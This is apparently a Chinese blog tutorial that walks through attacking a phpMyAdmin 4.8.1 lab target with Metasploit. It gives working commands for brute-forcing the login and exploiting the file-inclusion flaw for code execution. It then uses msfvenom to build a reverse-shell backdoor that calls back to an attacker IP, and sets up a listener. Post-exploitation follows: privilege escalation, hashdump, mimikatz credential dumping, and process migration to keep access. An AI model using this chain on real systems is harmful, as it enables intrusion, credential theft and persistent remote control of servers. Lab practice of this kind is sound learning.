准备好一个phpmyadmin4.8.1作为靶场,试试利用msf来完成攻击
MSF通常针对这种nday的漏洞,非常的好用
第一次使用msf,需要操作以下步骤:
然后就可以开始开干了;
msf的框架:
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持
Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统
Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截
先选择辅助模块的密码爆破模块:
use auxiliary/scanner/http/phpmyadmin_login
其实这个用bp自己爆一样,因为字典也是要自己准备的
use成功会附带小括号在旁边
然后options,去看这个模块的选项功能,yes的是你需要去设置的
比如这里:
set pass_file ~/Desktop/psw.txt(把字典放桌面就好)
set rhosts 192.168.1.5 (目标主机ip)
set targeturi /phpadmin4.8.1/index.php (目标主机phpmyadmin登录目录)
set threads 2 (设置进程数)
然后run就开始进攻了:
【然后我就发现我这本弱口令应该要换了,我设的6位数字的密码都爆不成功】
假装爆破成功—》进入下一个功能:
4.8.0-4.8.1版本是有文件包含漏洞,详情不细说【课程有】
我们利用phpmyadmin漏洞进行攻击
选择对应的攻击模块
use exploit/multi/http/phpmyadmin_lfi_rce:
设置参数和payload:
set rhosts 192.168.1.5 (设置目标主机ip)
set password 047047 (设置目标主机phpmyadmin密码)【虽然options显示no,但是其实必须得填,要不然第一步在干嘛呢】
set payload php/meterpreter/reverse_tcp 【反向连接】
set lhost 192.168.1.128 (设置攻击机机ip【你kali的ip】)
set lport 4747 (设置靶机连接攻击机的端口【随便设个没用的】)
targeturi这里也是个坑,记得需要/xxxx/,因为这里有个302重定向,后面不加/就会失败
还是失败了
本贴终结
【netstat -tln查看使用端口,fuser -k 端口号/tcp 关闭端口】
后续【按道理上步应该成功,but失败了我们就手搓后门】:msf创建一个后门文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.128 lport=14444 -f exe > D88047.exe
-p 选择使用的payload
-f 生成的文件格式
这里是一个没有任何免杀能力的后门文件,免杀这里暂且不谈
payload选择:
msfvenom 用来生成后门文件
将生成的后门放到目标系统上
在msf中创建一个监听=>use exploit/multi/handler 启用这个监听模块
需要去更改payload options,用什么payload生成的后门,就要改成什么
【bind正向,reverse反向】
反向连接 => 目标 => 我们 vps(公网IP) 【防护设备可能不检测服务器发起的请求。】
在靶机送去我们的后门文件
然后监听:
【记得set payload windows/x64/meterpreter/reverse_tcp!!!要不然就会跟个小丑一样在呢不知道为什么连不上,像我有个朋友一样肯定不是我】
终于成功啦,进入到了meterpreter现在才刚开始!
进入到提权环节:
getuid=>查看权限:
若是之前通过use exploit/multi/http/phpmyadmin_lfi_rce连接,则是php连接并不稳定,我们就可以用这种方式丢一个木马进去,用它进行连接,变成windows连接,较稳定:upload shell.exe=》execute -f shell.exe
sysinfo查看:
hashdump、getsystem (权限低都做不了)
获得system权限后可以获取管理员账号和密码
加载mimikatz=》我们使用MSF中的mimikatz:load mimikatz or load kiwi
meterpreter > creds_kerberos 读取明文密码:
meterpreter > creds_msv 读取hash
迁移进程
查看进程:ps
选择一个有system权限的进程
迁移进程:
migrate pid:
这样如果后门木马被删了:
但我们的连接还是在继续:
除非把我们迁移到的进程给关了,否则这台服务器就被我们黑了
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.